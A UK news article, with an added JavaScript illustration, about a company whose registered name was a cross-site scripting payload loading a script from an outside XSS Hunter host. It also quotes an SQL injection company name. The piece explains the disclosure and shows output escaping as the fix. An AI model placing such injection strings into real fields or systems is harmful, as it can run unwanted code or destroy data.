Company forced to change name that could be used to hack websites | UK news

Companies House has forced a company to change its name after it belatedly realised it could pose a security risk.

The company now legally known as “THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD” was set up by a British software engineer, who says he did it purely because he thought it would be “a fun playful name” for his consulting business.

He now says he didn’t realise that Companies House was actually vulnerable to the extremely simple technique he used, known as “cross-site scripting”, which allows an attacker to run code from one website on another.

The original name of the company was “"><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD”. By beginning the name with a quotation mark and chevron, any site which failed to properly handle the HTML code would have mistakenly thought the company name was blank, and then loaded and executed a script from the site XSS Hunter, which helps developers find cross-site scripting errors.

That script would have simply put up a harmless alert – but it serves as proof that a malicious attacker could instead have used the same weakness as a gateway to more damaging ends.
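The mechanism described above, as an added example (not code from the article or from Companies House): a hypothetical page template that places the company name in a double-quoted `value` attribute, rendered with and without output encoding. `renderNaive`, `renderEscaped`, `unescapeHtml` and `scanTags` are illustrative names, and `scanTags` is a simplified stand-in for a browser's HTML parser.

```javascript
// Added example: hypothetical template code, not Companies House's own.
// The name reported in the article, used only as an inert test string.
const NAME = '"><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD';

// Vulnerable: the name is pasted into a double-quoted attribute unchanged.
function renderNaive(name) {
  return `<input name="company" value="${name}">`;
}

// Hardened: encode HTML-significant characters at the point of output.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}
function renderEscaped(name) {
  return `<input name="company" value="${escapeHtml(name)}">`;
}

// Reverse of escapeHtml, to show the encoded name is preserved, not dropped.
function unescapeHtml(text) {
  return text.replace(/&(?:amp|lt|gt|quot|#39);/g, (entity) =>
    Object.keys(ENTITIES).find((ch) => ENTITIES[ch] === entity));
}

// Simplified stand-in for a browser's parser: lists each start tag with its
// attributes, treating double-quoted values as opaque text.
function scanTags(html) {
  const tags = [];
  const tagRe = /<([a-zA-Z][a-zA-Z0-9]*)((?:"[^"]*"|[^">])*)>/g;
  for (const [, tag, rawAttrs] of html.matchAll(tagRe)) {
    const attrs = {};
    for (const [, key, quoted, bare] of rawAttrs.matchAll(/([a-zA-Z-]+)=(?:"([^"]*)"|([^\s">]+))/g)) {
      attrs[key.toLowerCase()] = quoted !== undefined ? quoted : bare;
    }
    tags.push({ tag: tag.toLowerCase(), attrs });
  }
  return tags;
}

// Naive output: value is empty and a separate script element appears.
console.log(scanTags(renderNaive(NAME)));
// Escaped output: one input element whose value decodes to the full name.
console.log(scanTags(renderEscaped(NAME)));
```

In the naive rendering the scanner reports an `input` with an empty `value` followed by a `script` element; with encoding applied there is a single `input` whose value still carries the whole name as text.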

Similar names have been registered in the past, such as “; DROP TABLE "COMPANIES";-- LTD”, a wry attempt to carry out an attack known as SQL injection, inspired by a famous XKCD webcomic, but this was the first such name to have prompted a response. Companies House has retroactively removed the original name from its data feeds, and all documentation referring to its original moniker now reads simply “Company name available on request”.

The director of the company, who asked not to be named, told the Guardian: “Government Digital Service – GDS – have a good reputation for security, and other companies with similarly playful names have been registered in the past, so I thought there probably wouldn’t be a problem.

“When I discovered there were some minor problems, I contacted Companies House and the National Cyber Security Centre immediately, and didn’t disclose the issue to anyone else.”

He did not realise it would be an issue, he said, because characters including > and " are explicitly allowed in company names, which suggested that the agency had put security measures in place to prevent such attacks.

A Companies House spokesperson said: “A company was registered using characters that could have presented a security risk to a small number of our customers, if published on unprotected external websites. We have taken immediate steps to mitigate this risk and have put measures in place to prevent a similar occurrence. We are confident that Companies House services remain secure.”

